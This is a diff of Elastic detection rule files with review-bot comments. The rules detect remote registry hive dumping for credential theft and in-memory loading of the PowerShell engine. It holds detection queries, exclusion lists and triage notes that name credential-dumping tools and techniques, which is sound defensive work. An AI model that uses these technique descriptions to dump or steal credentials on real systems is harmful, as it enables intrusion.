b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_109.json 
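Review bot: The new `setup` line still reads `Both data should be collected from the host for this detection to work.`; since the sentence refers to the two event sources named just before it, `Both data sources must be collected from the host for this detection to work.` is the intended wording. The rest of this hunk only replaces `\u003c` with `<` inside the same string, which decodes to the identical JSON value, so the rule's setup text and detection logic are otherwise unchanged; the `_109.json` setup hunk below carries the same escape-only change and the same sentence. If these versioned rule files are produced by the package build, the wording fix belongs in the rule source rather than in this snapshot.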
@@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", + "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" 
@@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_104.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_104.json index f41553a61b3..597d1f6406a 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PowerShell Engine ImageLoad", - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) 
and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) 
and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") or\n file.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\")) and\n\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n 
\"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
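Review bot: The new `setup` line keeps the doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; it should read `Steps to implement the logging policy with Advanced Audit Configuration:`. The identical text is on the `+` line of the `_105.json` setup hunk further down, so the same correction applies there. Apart from that, the hunk only swaps `\u003e` for `>` inside the string, which yields the same decoded value, so the displayed setup guidance is unchanged; if these versioned files are generated, correct the typo in the rule source so the next build does not reintroduce it.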
diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_105.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_105.json index b61aa3e4d87..2eab8fa63d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PowerShell Engine ImageLoad", - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) 
and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) 
and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") or\n file.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\")) and\n\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n 
\"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"Ssms.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_106.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_106.json index a53ab0a8034..0a9f8c79d3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PowerShell Engine ImageLoad", - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) 
and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) 
and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") or\n file.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\")) and\n\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n 